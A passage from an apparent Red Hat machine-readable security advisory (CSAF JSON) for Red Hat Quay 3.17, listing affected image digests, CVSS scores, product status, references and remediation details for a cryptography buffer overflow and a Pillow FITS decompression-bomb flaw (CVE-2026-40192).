            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API"
    },
    {
      "cve": "CVE-2026-40192",
      "cwe": {
        "id": "CWE-409",
        "name": "Improper Handling of Highly Compressed Data (Data Amplification)"
      },
      "discovery_date": "2026-04-16T00:00:49.590876+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2458856"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "RHBZ#2458856",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
          "url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/pull/9521",
          "url": "https://github.com/python-pillow/Pillow/pull/9521"
        },
        {
          "category": "external",
          "summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
        },
        {
          "category": "external",
          "summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
          "url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
        }
      ],
      "release_date": "2026-04-15T22:53:56.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
